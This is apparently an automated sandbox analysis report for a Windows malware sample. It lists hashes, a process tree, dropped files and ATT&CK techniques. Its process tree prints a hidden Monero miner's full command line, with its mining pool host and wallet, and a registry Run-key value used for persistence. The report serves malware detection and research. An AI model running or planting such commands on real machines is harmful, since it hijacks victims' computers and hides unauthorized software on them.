15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19

Analysis

max time kernel
149s
max time network
152s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 20:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe
Size

1.5MB
MD5

cf31cfa14dc88a1584b8cc2bdba533f1
SHA1

8de2b2a9c9c3b83547fba5641bf85970ad7cd238
SHA256

15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19
SHA512

f031e6c9b08e9793295d7619cc50720ab5e6462cda76789c94692abfe6f9d6ca7d4e3ebd05bc0311066a9ca8cd285e42e5cd2f618eda023230b0266eaa7dfcac
SSDEEP

24576:3NBIcopOJyR3R428wZhbZrvHWsMdQr0Zu6TmQmWZpL5jbrTkY2cAZ9dtprYHUUPr:ApEyR3RJBhhv2Y09TnZx5fV2cA3ZHYr

Score

8^/10

persistence

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

key.exedwm.exe

pid process

1492 key.exe
728 dwm.exe

pid	process
1492	key.exe
728	dwm.exe

Loads dropped DLL 17 IoCs

Processes:

15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exerundll32.exedwm.exe

pid	process
1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe
1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe
1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe
1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe
524	rundll32.exe
524	rundll32.exe
524	rundll32.exe
524	rundll32.exe
524	rundll32.exe
524	rundll32.exe
1280
728	dwm.exe
728	dwm.exe
728	dwm.exe
728	dwm.exe
728	dwm.exe
728	dwm.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

key.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\	key.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\tsiVideo = "C:\\Windows\\SysWOW64\\rundll32.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\\\mdi064.dll,asdasd"	key.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exekey.exerundll32.exe

description	pid	process	target process
PID 1880 wrote to memory of 1492	1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe	key.exe
PID 1880 wrote to memory of 1492	1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe	key.exe
PID 1880 wrote to memory of 1492	1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe	key.exe
PID 1880 wrote to memory of 1492	1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe	key.exe
PID 1880 wrote to memory of 1492	1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe	key.exe
PID 1880 wrote to memory of 1492	1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe	key.exe
PID 1880 wrote to memory of 1492	1880	15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe	key.exe
PID 1492 wrote to memory of 524	1492	key.exe	rundll32.exe
PID 1492 wrote to memory of 524	1492	key.exe	rundll32.exe
PID 1492 wrote to memory of 524	1492	key.exe	rundll32.exe
PID 1492 wrote to memory of 524	1492	key.exe	rundll32.exe
PID 1492 wrote to memory of 524	1492	key.exe	rundll32.exe
PID 1492 wrote to memory of 524	1492	key.exe	rundll32.exe
PID 1492 wrote to memory of 524	1492	key.exe	rundll32.exe
PID 524 wrote to memory of 728	524	rundll32.exe	dwm.exe
PID 524 wrote to memory of 728	524	rundll32.exe	dwm.exe
PID 524 wrote to memory of 728	524	rundll32.exe	dwm.exe
PID 524 wrote to memory of 728	524	rundll32.exe	dwm.exe

C:\Users\Admin\AppData\Local\Temp\15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe
"C:\Users\Admin\AppData\Local\Temp\15d47d0bba434c0106c099cb1d9dabf822e94fb219b285b83e6853230b093e19.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1880

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\\mdi064.dll,asdasd
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:524

C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -a cryptonight -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -p x -u 42ychz53apvgs3EHMoeAyGQM3pq7EikTLTBu1RaBj8njgVfykF4v8HdPNyzAfDTDUGZfoLjMdh9Wa4u1Bm2t3f7aSFSwS4U.03 -t 16
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:728

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Zwotgvk.gif
Filesize
1.3MB

MD5
ca9c8529b80946db4c92cf4b27483a8a

SHA1
8630bb6dc8b0080cae9cded2d5c82dac2b87b552

SHA256
9502a6ad53091da8456ace1a58f2f0ebc5dea58f5af5ba5048c4eff15aecd2d5

SHA512
b320a637ce9828b8b55df0aea2709c47af0cea059245c2e68da5945f558f9b0e69efc5888867ffbd38a6027c3589e15006ae4892fe171d15dfb9218195593bf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
018d5de5314b85bacaafca9e2bcedaa0

SHA1
85a54173a40db6865d5fa9dabcff9358006d94ab

SHA256
49c29755256886ea8f9aaf874ee12cb020e090edada8a885f22f27495d99896b

SHA512
afd9ef4d066b86b44c08b452103e7a849bb962239630d1bb17ff33a6994d800a76e7a415a975dbe1e80bcb9f63b4a61fea89aad097d5c4b5a5537a47e8da9d66

Download Submit
C:\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
1.2MB

MD5
bf52463eb2b43eef8412bda49f2602b9

SHA1
8eeedc0baba079bc5811027f043ff034c1173c5e

SHA256
a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74

SHA512
bab6a03bad5003b043e851c2ed5108137acc9be584b8024075e6db1f74aea7823ea25a3cf094f7d2aa98e059b310fba51476e27f414b340f3207ad32a78c9377

Download Submit
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
Filesize
892KB

MD5
a76fd14d26b739aa7fe4358c30c1d30e

SHA1
0b8f2ec4de56088700409483a5793bd35c85cd9e

SHA256
cf2bff3b2cbe17ff387c69f3715e346b8f2e122aafec16b292dff34101bf44b4

SHA512
3b01fab0eae273cde92af6b72587dbbe0c1834c82512d54a175168071295ec8af99260aaf78638eadb70496382d4c6eefcda3b8083a230b3cb910152499e6e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\msupdate71\libcurl-4.dll
Filesize
511KB

MD5
882a19580596d8e90e1f95ea3320347e

SHA1
cef622275d69a206d84363ea07b243ab9804d2f5

SHA256
7719ddd67ff07beb26bc31d1cf925f278e302e6163e02169ff7dcefcb651e007

SHA512
ea138d1d53ee183caf4fec9bead1f71517de13fb34be826ab87941830199e2d6b925146fa9461537e86fe2b4ab24556ebc5ca5cee71e25146c02beae26a3a5f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\msupdate71\libiconv-2.dll
Filesize
927KB

MD5
416476b79ba6b39199c9ed98f8d63867

SHA1
260096676ead5f1fb5db021c57fb4700995e590b

SHA256
cf33fc7fdf9de404736a23b6821fd596aa53492a51dd4d83958c0de477947708

SHA512
d12fc098ebcac2f93952d1d00a69934614443ea6d07ebd758cd3e89ecf5df36c9c28f142cb1d526cc8dff07718b17693799d131d4d5f1de839a4ef9ea0b2df97

Download Submit
C:\Users\Admin\AppData\Local\Temp\msupdate71\libidn-11.dll
Filesize
206KB

MD5
f8a0d5fe3fd8569ed3cac7318cdc493a

SHA1
27a82c19abbadff848f86ee9b9ed579c8b1f7b7b

SHA256
6e4d69c688b9f318bb497cd7a322df2e5470529880420b783061fa87aa916570

SHA512
f0328b52a14e9f3d3f72b8f77431bd757ccd5b10d65b5e8d7d67f733e09b23aa6113147cf53a9a0518cb6a4810027e5985ac109b604396cc75abfb35752cf9e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\msupdate71\libintl-8.dll
Filesize
112KB

MD5
9650b3149085e7df43acad2703b81fd8

SHA1
38d25e33825a67943fb8081a651d854fcdbfdc15

SHA256
34618f63fd89c387019f7c061846d318fa98b52c7d9025de093d442f29d4e87b

SHA512
4f8eff628f279d9d042801837518d501420a9b8d85771cbe26bc40ded2e5a701d665838e0c672fef8e0e694b4cc853e07364915ae39cc68f6bd96ff3dae5e9e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\msupdate71\libwinpthread-1.dll
Filesize
298KB

MD5
bb0019619d0e3b013018ba6cbfb6185f

SHA1
c23b023ac220283b81d98bbdf5ada3e40ab20e60

SHA256
4dd3c7262580fb8a03813c249b643d81dd0e5b90e883102a33a5a1d62500132e

SHA512
9b2731e63d50b78bf27b680f3ef33b85e68659dadaf9734ccbeb9297370c323e39d13a5b794b705a892203064dad156f6471612cb40415d6d7701347641db0a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\msupdate71\zlib1.dll
Filesize
113KB

MD5
cb0577e362e193cad14c3d23c40c30d4

SHA1
65db52c270bc8f1e9435d95456da9f1e45e74fd9

SHA256
9e93a45fb249f32d1aac4e69ce84ceae783782e75148e572fdde3bfe2579121c

SHA512
4c1cc231599e0928ae67d1e3493417b35c6185739795b00da8cad6580a44f56df3769d652f8dd1798e762c11e87904bf0624fe6c2392b2e35fba15160959b32b

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
018d5de5314b85bacaafca9e2bcedaa0

SHA1
85a54173a40db6865d5fa9dabcff9358006d94ab

SHA256
49c29755256886ea8f9aaf874ee12cb020e090edada8a885f22f27495d99896b

SHA512
afd9ef4d066b86b44c08b452103e7a849bb962239630d1bb17ff33a6994d800a76e7a415a975dbe1e80bcb9f63b4a61fea89aad097d5c4b5a5537a47e8da9d66

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
018d5de5314b85bacaafca9e2bcedaa0

SHA1
85a54173a40db6865d5fa9dabcff9358006d94ab

SHA256
49c29755256886ea8f9aaf874ee12cb020e090edada8a885f22f27495d99896b

SHA512
afd9ef4d066b86b44c08b452103e7a849bb962239630d1bb17ff33a6994d800a76e7a415a975dbe1e80bcb9f63b4a61fea89aad097d5c4b5a5537a47e8da9d66

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
018d5de5314b85bacaafca9e2bcedaa0

SHA1
85a54173a40db6865d5fa9dabcff9358006d94ab

SHA256
49c29755256886ea8f9aaf874ee12cb020e090edada8a885f22f27495d99896b

SHA512
afd9ef4d066b86b44c08b452103e7a849bb962239630d1bb17ff33a6994d800a76e7a415a975dbe1e80bcb9f63b4a61fea89aad097d5c4b5a5537a47e8da9d66

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
Filesize
76KB

MD5
018d5de5314b85bacaafca9e2bcedaa0

SHA1
85a54173a40db6865d5fa9dabcff9358006d94ab

SHA256
49c29755256886ea8f9aaf874ee12cb020e090edada8a885f22f27495d99896b

SHA512
afd9ef4d066b86b44c08b452103e7a849bb962239630d1bb17ff33a6994d800a76e7a415a975dbe1e80bcb9f63b4a61fea89aad097d5c4b5a5537a47e8da9d66

Download Submit
\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
1.2MB

MD5
bf52463eb2b43eef8412bda49f2602b9

SHA1
8eeedc0baba079bc5811027f043ff034c1173c5e

SHA256
a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74

SHA512
bab6a03bad5003b043e851c2ed5108137acc9be584b8024075e6db1f74aea7823ea25a3cf094f7d2aa98e059b310fba51476e27f414b340f3207ad32a78c9377

Download Submit
\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
1.2MB

MD5
bf52463eb2b43eef8412bda49f2602b9

SHA1
8eeedc0baba079bc5811027f043ff034c1173c5e

SHA256
a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74

SHA512
bab6a03bad5003b043e851c2ed5108137acc9be584b8024075e6db1f74aea7823ea25a3cf094f7d2aa98e059b310fba51476e27f414b340f3207ad32a78c9377

Download Submit
\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
1.2MB

MD5
bf52463eb2b43eef8412bda49f2602b9

SHA1
8eeedc0baba079bc5811027f043ff034c1173c5e

SHA256
a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74

SHA512
bab6a03bad5003b043e851c2ed5108137acc9be584b8024075e6db1f74aea7823ea25a3cf094f7d2aa98e059b310fba51476e27f414b340f3207ad32a78c9377

Download Submit
\Users\Admin\AppData\Local\Temp\mdi064.dll
Filesize
1.2MB

MD5
bf52463eb2b43eef8412bda49f2602b9

SHA1
8eeedc0baba079bc5811027f043ff034c1173c5e

SHA256
a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74

SHA512
bab6a03bad5003b043e851c2ed5108137acc9be584b8024075e6db1f74aea7823ea25a3cf094f7d2aa98e059b310fba51476e27f414b340f3207ad32a78c9377

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
Filesize
892KB

MD5
a76fd14d26b739aa7fe4358c30c1d30e

SHA1
0b8f2ec4de56088700409483a5793bd35c85cd9e

SHA256
cf2bff3b2cbe17ff387c69f3715e346b8f2e122aafec16b292dff34101bf44b4

SHA512
3b01fab0eae273cde92af6b72587dbbe0c1834c82512d54a175168071295ec8af99260aaf78638eadb70496382d4c6eefcda3b8083a230b3cb910152499e6e4a

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
Filesize
892KB

MD5
a76fd14d26b739aa7fe4358c30c1d30e

SHA1
0b8f2ec4de56088700409483a5793bd35c85cd9e

SHA256
cf2bff3b2cbe17ff387c69f3715e346b8f2e122aafec16b292dff34101bf44b4

SHA512
3b01fab0eae273cde92af6b72587dbbe0c1834c82512d54a175168071295ec8af99260aaf78638eadb70496382d4c6eefcda3b8083a230b3cb910152499e6e4a

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
Filesize
892KB

MD5
a76fd14d26b739aa7fe4358c30c1d30e

SHA1
0b8f2ec4de56088700409483a5793bd35c85cd9e

SHA256
cf2bff3b2cbe17ff387c69f3715e346b8f2e122aafec16b292dff34101bf44b4

SHA512
3b01fab0eae273cde92af6b72587dbbe0c1834c82512d54a175168071295ec8af99260aaf78638eadb70496382d4c6eefcda3b8083a230b3cb910152499e6e4a

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\libcurl-4.dll
Filesize
511KB

MD5
882a19580596d8e90e1f95ea3320347e

SHA1
cef622275d69a206d84363ea07b243ab9804d2f5

SHA256
7719ddd67ff07beb26bc31d1cf925f278e302e6163e02169ff7dcefcb651e007

SHA512
ea138d1d53ee183caf4fec9bead1f71517de13fb34be826ab87941830199e2d6b925146fa9461537e86fe2b4ab24556ebc5ca5cee71e25146c02beae26a3a5f9

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\libiconv-2.dll
Filesize
927KB

MD5
416476b79ba6b39199c9ed98f8d63867

SHA1
260096676ead5f1fb5db021c57fb4700995e590b

SHA256
cf33fc7fdf9de404736a23b6821fd596aa53492a51dd4d83958c0de477947708

SHA512
d12fc098ebcac2f93952d1d00a69934614443ea6d07ebd758cd3e89ecf5df36c9c28f142cb1d526cc8dff07718b17693799d131d4d5f1de839a4ef9ea0b2df97

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\libidn-11.dll
Filesize
206KB

MD5
f8a0d5fe3fd8569ed3cac7318cdc493a

SHA1
27a82c19abbadff848f86ee9b9ed579c8b1f7b7b

SHA256
6e4d69c688b9f318bb497cd7a322df2e5470529880420b783061fa87aa916570

SHA512
f0328b52a14e9f3d3f72b8f77431bd757ccd5b10d65b5e8d7d67f733e09b23aa6113147cf53a9a0518cb6a4810027e5985ac109b604396cc75abfb35752cf9e0

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\libintl-8.dll
Filesize
112KB

MD5
9650b3149085e7df43acad2703b81fd8

SHA1
38d25e33825a67943fb8081a651d854fcdbfdc15

SHA256
34618f63fd89c387019f7c061846d318fa98b52c7d9025de093d442f29d4e87b

SHA512
4f8eff628f279d9d042801837518d501420a9b8d85771cbe26bc40ded2e5a701d665838e0c672fef8e0e694b4cc853e07364915ae39cc68f6bd96ff3dae5e9e7

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\libwinpthread-1.dll
Filesize
298KB

MD5
bb0019619d0e3b013018ba6cbfb6185f

SHA1
c23b023ac220283b81d98bbdf5ada3e40ab20e60

SHA256
4dd3c7262580fb8a03813c249b643d81dd0e5b90e883102a33a5a1d62500132e

SHA512
9b2731e63d50b78bf27b680f3ef33b85e68659dadaf9734ccbeb9297370c323e39d13a5b794b705a892203064dad156f6471612cb40415d6d7701347641db0a8

Download Submit
\Users\Admin\AppData\Local\Temp\msupdate71\zlib1.dll
Filesize
113KB

MD5
cb0577e362e193cad14c3d23c40c30d4

SHA1
65db52c270bc8f1e9435d95456da9f1e45e74fd9

SHA256
9e93a45fb249f32d1aac4e69ce84ceae783782e75148e572fdde3bfe2579121c

SHA512
4c1cc231599e0928ae67d1e3493417b35c6185739795b00da8cad6580a44f56df3769d652f8dd1798e762c11e87904bf0624fe6c2392b2e35fba15160959b32b

Download Submit
memory/524-63-0x0000000000000000-mapping.dmp

Download
memory/728-73-0x0000000000000000-mapping.dmp

Download
memory/728-88-0x0000000000400000-0x00000000004EA000-memory.dmp

Filesize
936KB

Download
memory/728-89-0x0000000000400000-0x00000000004EA000-memory.dmp

Filesize
936KB

Download
memory/1492-65-0x0000000002400000-0x000000000257A000-memory.dmp

Filesize
1.5MB

Download
memory/1492-59-0x0000000000000000-mapping.dmp

Download
memory/1880-54-0x0000000076201000-0x0000000076203000-memory.dmp

Filesize
8KB

Download